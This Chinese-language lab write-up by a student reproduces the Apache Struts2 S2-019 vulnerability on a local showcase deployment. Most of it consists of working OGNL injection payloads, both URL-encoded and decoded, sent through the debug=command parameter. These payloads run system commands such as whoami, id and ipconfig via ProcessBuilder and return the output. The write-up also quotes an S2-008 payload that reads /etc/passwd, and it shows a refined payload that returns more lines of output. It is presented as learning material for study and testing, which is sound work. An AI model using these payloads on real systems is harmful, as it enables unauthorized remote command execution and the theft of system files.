Struts-02-019

此文仅供大家交流学习，严禁非法使用

一、参考网址：

https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-008

二、 影响版本：

Struts 2.0.0 - Struts 2.3.15.1

三、 漏洞介绍：

动态方法调用是一种已知会施加可能的安全漏洞的机制，但到目前为止，它默认启用，警告用户应尽可能将其关闭。

四、 环境搭建：

• 下载/struts/2.1.6

下载地址：http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip

• 下载安装xampp

• 部署showcase

• 解压

2.1.6_1.png

2.1.6_2.png

• 复制到.

2.1.6_3.png

• 重启tomcat

2.1.6_4.png

• 已成功自动部署

2.1.6_5.png

• 访问http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action

• 打开struts.xml

  
  
  devmode.png
  
  

  保证<constant name="struts.devMode" value="true" />

• 大家可以自行在参考网址使用docker安装linux环境

五、 POC:

?debug=command&expression=%23a%3D%28new%20java.lang.ProcessBuilder%28%27whoami%27%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23out%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23out.getWriter%28%29.flush%28%29%2C%23out.getWriter%28%29.close%28%29%0A

从url编码转化回来为：

?debug=command&expression=#a=(new java.lang.ProcessBuilder('id')).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#out=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#out.getWriter().println(new java.lang.String(#e)),#out.getWriter().flush(),#out.getWriter().close()

发现与s2-008差不多，从参考网址查看s2-008的POC，为

?debug=command&expression=(#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))

不同的仅仅是由原先的["allowStaticMethodAccess"]=true静态方法执行改为(new java.lang.ProcessBuilder('id')).start()，但该方法在虚空浪子心提出s2-012后不久就在博客里说明了官方修补方案将allowStaticMethodAccess取消了后的替补方法就是使用ava.lang.ProcessBuilder。仅仅就这么简单的区别吗？可能我认识比较短浅吧。。

六、 测试网址：

原始网址：

http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action

修改后网址：

http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action?debug=command&expression=%23a%3D%28new%20java.lang.ProcessBuilder%28%27ipconfig%27%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23out%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23out.getWriter%28%29.println%28%27dbapp%3A%27%2bnew%20java.lang.String%28%23e%29%29%2C%23out.getWriter%28%29.flush%28%29%2C%23out.getWriter%28%29.close%28%29%0A

七、执行结果

不停的访问。。（不知什么情况），有下载文件，下载notepad++打开有命令执行的结果

八、发现问题并修改

还是出现了多行结果只输出一行的问题，根据之前的方法修改POC，改变e的大小为500，重复执行 #d.read(#e),#out.getWriter().println(new java.lang.String(#e))，这里的大小和重复次数可以根据需求修改
修改后POC

?debug=command&expression=#a=(new java.lang.ProcessBuilder('ipconfig')).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#out=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#out.getWriter().println(new java.lang.String(#e)), #d.read(#e),#out.getWriter().println(new java.lang.String(#e)) , #d.read(#e),#out.getWriter().println(new java.lang.String(#e)) ,#out.getWriter().flush(),#out.getWriter().close()

修改后网址

http://ip:8080/struts2-showcase-2.1.6/showcase.action?debug=command&expression=%23a%3D%28new%20java.lang.ProcessBuilder%28%27ipconfig%27%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500000%5D%2C%23d.read%28%23e%29%2C%23out%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%20%23d.read%28%23e%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%20%2C%20%23d.read%28%23e%29%2C%23out.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%20%2C%23out.getWriter%28%29.flush%28%29%2C%23out.getWriter%28%29.close%28%29

执行结果

Paste_Image.png

九、 至此，该漏洞基本利用完毕

本人还是一个未毕业的小萌新，希望大家多多帮助，有问题请发送邮件到xrzsupupup@163.com不胜感激，我也会尽量去帮助大家

坚决做一名白帽子